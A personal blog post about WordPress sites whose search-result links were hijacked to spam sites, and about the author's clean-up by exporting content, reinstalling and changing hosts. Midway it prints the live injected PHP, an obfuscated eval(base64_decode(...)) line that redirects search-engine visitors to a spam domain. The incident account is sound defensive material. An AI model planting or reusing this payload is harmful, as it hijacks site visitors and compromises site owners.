WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our troubleticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire


folder from my old site and then upload the entire


directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. Atleast all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.

One thought on “WordPress + Google Search Result links redirected/hijacked/hacked

Leave a Reply

Your email address will not be published. Required fields are marked *